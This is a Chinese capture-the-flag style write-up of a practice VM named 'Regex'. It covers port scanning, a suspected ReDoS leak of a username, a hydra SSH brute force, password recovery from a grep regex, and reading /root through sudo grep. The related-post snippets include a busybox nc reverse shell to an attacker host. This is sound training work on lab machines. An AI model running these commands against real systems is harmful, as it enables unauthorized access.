群友靶机之Regex

发表于2025-12-24|更新于2025-12-24|群友靶机

|浏览量:

1
2
3

获取靶机地址：
https://maze-sec.com/
qq群：660930334

配置：

靶机用VirtualBox制作，VMware导入可能网卡不兼容
用户:todd 密码:qq660930334
1. 启动虚拟机时按`e`键进入GRUB编辑模式
2. 修改启动参数：将`ro`改为`rw single init=/bin/bash`
3. 按Ctrl+X启动进入单用户模式
vim /etc/network/interfaces
allow-hotplug ens33
iface ens33 inet dhcp

ip link set ens33 up
dhclient ens33
reboot -f

端口扫描

1	22,80,5000端口，80端口什么都没有，切入点应该在5000端口上了

服务探测

1	进来是一个邮箱验证，目录扫描也没有什么tips点上，常规查看源码发现有一个被注释掉了的邮箱地址，看看有什么用先

只是单纯的返回了邮箱验证正确，搜regax存在个redos攻击，那么可能验证的邮箱是用的正则匹配，可能存在redos攻击获得报错信息，刚好获得一个用户名信息---cyllove，那么就去ssh爆破

爆破ssh

1 2	hydra -l cyllove -P /usr/share/wordlists/rockyou.txt 192.168.44.147 ssh cyllove/pandora

权限转移

1
2

echo "$1"|grep -P '^(?=z)(?=.)(?=zY)(?=.*)(?=zYA)(?=zYAz)(?=.{4}8)(?=.{4}8G)(?=.{4}8GO)(?=.{4}8GOz)(?=.{4}8GOz3)(?=.{4}8GOz3O)(?=.{4}8GOz3OX)(?=.{4}8GOz3OXD)(?=.{12}k)(?=.{12}ki)(?=.{12}kim)(?=.{12}kimb)(?=.{12}kimbh)(?=.{12}kimbhR)(?=.{12}kimbhR2)(?=.{12}kimbhR24)(.){20}$'
[[ $? -eq 0 ]] && echo "Password Correct."

1	正则强匹配获得密码zYAz8GOz3OXDkimbhR24，ssh连接上去

权限提升

1
2
3

给了权限个grep,sudo grep -Pnr . /root
可以直接过滤出root.txt,也可以获得root密码
t17Wej73Ugw39iphHxvK

文章作者: 陈羽琳

文章链接: https://cyl-love.github.io/posts/32329.html

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源再努力一点，她是不是就会回来！

相关推荐

群友靶机之5ud0

123获取靶机地址：https://maze-sec.com/qq群：660930334 配置：123456789101112靶机用VirtualBox制作，VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数：将`ro`改为`rw single init=/bin/bash`3. 按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 180端口和22端口，80端口是一个Textpattern CMS，过去看看 80端口探测12345访问一下显示无法访问，发现跳转到了textpattern.dsz 那就把放他到hosts当中sudo vim /etc/hosts192.168.44.153 textpattern.dsz 再次访问,可以正常访问了 nday利用1搜索一下Tex...

群友靶机之Lzh

123获取靶机地址：https://maze-sec.com/qq群：660930334 配置：123456789101112靶机用VirtualBox制作，VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数：将`ro`改为`rw single init=/bin/bash`3. 按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 1依旧是22,80端口目录扫描 1给了个cms的源码,应该是有部署了这一套的cms，尝试访问/mozilo/ 立足点12如果是cms，那应该就是打的nday了【之前打的awd倒是很多这种】版本也给了，直接搜发现有个rce的洞 123看了利用方式那就是后台直接upload文件上传，然后在/kategorien/Willkommen/dat...

群友靶机之7r1umph

123获取靶机地址：https://maze-sec.com/qq群：660930334 配置：12345678910111213靶机用VirtualBox制作，VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数：将`ro`改为`rw single init=/bin/bash`3. 按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 1依旧是22,80端口目录扫描 1index.php有一个上传口，/upload和/tmp是可访问文件目录口，/info.php是php的phpinfo，抓包走一遍文件上传逻辑 1文件上传的时候没啥限制，发现上传之后会在upload上但是后缀名加成.dsz,也会出现在/tmp上但是再点击的时候，就显示404，该文件也消失掉了，那思路应该就...

群友靶机之React

123获取靶机地址：https://maze-sec.com/qq群：660930334 配置：123456789101112靶机用VirtualBox制作，VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数：将`ro`改为`rw single init=/bin/bash`3. 按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 180,22,3000端口，在3000端口看到是nextjs最新的 CVE-2025-66478 rce漏洞 nday1为了方便后期实现就反弹shell到kali上面，busybox nc 192.168.44.128 4444 -e bash 123456789101112131415161718192021222324252627282930...

群友靶机之Open

123获取靶机地址：https://maze-sec.com/qq群：660930334 配置：123456789101112靶机用VirtualBox制作，VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数：将`ro`改为`rw single init=/bin/bash`3. 按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 1依旧经典的80端口加22端口，但是这里的80端口显示重定向到open.dsz，正常直接访问是访问不到的，做了个域名映射 80端口探测12sudo vim /etc/hosts192.168.44.139 open.dsz 远程文件包含12正常进来之后提示是一个远程文件包含(RFI)测试工具通过http://open@格式进行URL处理反弹s...

群友靶机之Monkey

123获取靶机地址：https://maze-sec.com/qq群：660930334 配置：12345678910111213靶机用VirtualBox制作，VMware导入可能网卡不兼容用户:todd 密码:qq6609303341. 启动虚拟机时按`e`键进入GRUB编辑模式2. 修改启动参数：将`ro`改为`rw single init=/bin/bash`3. 按Ctrl+X启动进入单用户模式vim /etc/network/interfacesallow-hotplug ens33iface ens33 inet dhcpip link set ens33 updhclient ens33reboot -f 端口扫描 1依旧是22,80端口 80端口探索 123进来是一个html，在源代码提示了个域名，依旧放到hosts当中8sudo vim /etc/hosts192.168.44.139 open.dsz 目录扫描 1这里出题人对dirsearch进行了限制，扫不出东西，换成gobuster来试试 tip点切入1234出了两个文件，其实bak.zip...